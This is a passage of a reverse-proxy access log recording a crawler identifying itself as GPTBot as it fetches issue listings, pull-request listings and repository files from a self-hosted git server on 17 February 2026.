3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=nearduedate&state=closed&type=all" +[17/Feb/2026:19:31:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10212] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:31:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&labels=0&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10189] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&labels=0&milestone=-1&sort=latest&state=open&type=all" +[17/Feb/2026:19:31:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:31:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&project=-1&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:31:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10236] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=mostcomment&state=open&type=all" +[17/Feb/2026:19:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:19:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=closed&type=all" +[17/Feb/2026:19:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c?display=rendered" [Client 74.7.227.38] [Length 11347] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdC/CMakeCCompilerId.c" +[17/Feb/2026:19:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10164] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=latest&state=open&type=all" +[17/Feb/2026:19:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9979] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip?display=rendered" [Client 74.7.227.38] [Length 11212] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/pip" +[17/Feb/2026:19:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 27688] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:19:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10058] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11772] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:19:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx?display=rendered" [Client 74.7.227.38] [Length 11212] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:19:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10218] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&state=open&type=all" +[17/Feb/2026:19:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10046] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?labels=0&sort=farduedate&state=open&type=all" +[17/Feb/2026:19:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10163] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?sort=oldest&state=open&type=all" +[17/Feb/2026:19:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9999] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:19:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=oldest&state=open&type=all" +[17/Feb/2026:19:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11752] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11319] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=source" [Client 74.7.227.38] [Length 11318] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11750] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:19:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11672] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11385] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11153] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:19:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16075] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:19:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=rendered" [Client 74.7.227.38] [Length 11154] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d" +[17/Feb/2026:19:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11386] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:19:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16076] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:19:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" +[17/Feb/2026:19:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10243] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=rendered" [Client 74.7.227.38] [Length 72053] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md?display=source" [Client 74.7.227.38] [Length 122747] [Gzip 7.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:19:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10055] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:31:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?labels=0&milestone=-1&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 